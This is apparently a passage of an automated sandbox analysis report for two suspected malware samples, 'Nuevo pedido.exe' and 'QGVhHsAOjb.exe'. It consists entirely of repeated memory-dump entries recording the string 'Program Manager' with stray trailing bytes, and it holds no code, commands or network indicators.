Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0o,
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH]A
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(>!
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<DR
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@N7
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerx
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL#]
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX\j
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpg
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0O
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@MK
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|!Z
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX;`
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDun
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd0G
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxX]
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\| #
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$u$
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8{U
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt0A
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql@Z
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxyg
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt0C
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt0D
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\aO
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhz>
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDrs
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd/[
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX8b
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q41^
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\b;
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8\|A
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qqq
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`)C
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<B]
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH{j
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh\|3
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0w
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(:e
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q n
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTS1
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL"&
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd1P
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHZ`
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q42J
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\d0
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4Rh
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0Kd
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q Kt
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`(W
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPk_
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlad
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\at
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$U4
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlAF
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<CI
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt8
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<cg
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh[)
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH;.
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`Ia
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0m7
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<iF
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdWM
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP/7
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpp<
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\%g
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdX9
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<hZ
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP.K
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(@D
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTVn
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx`1
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(`b
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q 1:
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8?m
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX?J
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@qS
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q)_
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q 0N
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh=j
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qJi
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlJ
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q${1
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|Eb
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlEr
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qli8
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL(3
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4Z<
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q+T
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(AM
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpqE
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,'j
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX@6
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@r?
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,<
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4YP
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlh
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD8[
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qmE
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlhL
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlH.
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<jO
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(B9
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q49D
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt6X
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDXp
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qppY
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0,t
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(^m
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTw9
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpm[
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q464
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLDg
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdUX
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTvM
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|#O
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\dr
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<G3
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$y<
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP-B
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qN%
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0O?
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<&)
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH_6
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlE0
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$xP
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP,V
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL%R
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4W[
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q /E
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlfW
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q Oc
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX=U
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt4c
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd4s
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@o^
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4wp
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlgC
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q .Y
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0r*
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLH#
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL&>
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4XG
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(?X
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|$;
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx~Z
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX`&
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX>A
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpC-
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXu6
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0"i
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhR
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$,9
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd+*
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<:l
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4n'
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDL4
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@eN
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\:I
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,=8
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt*%
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDKk
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|[0
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,<L
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpcK
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0do
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4*q
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@e?
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$M`
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt*S
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH5!
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@f:
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\^#
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|}C
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q %5
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx2`
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt+?
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtlD
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q&a
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTnA
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8VD
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8vb
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(vr
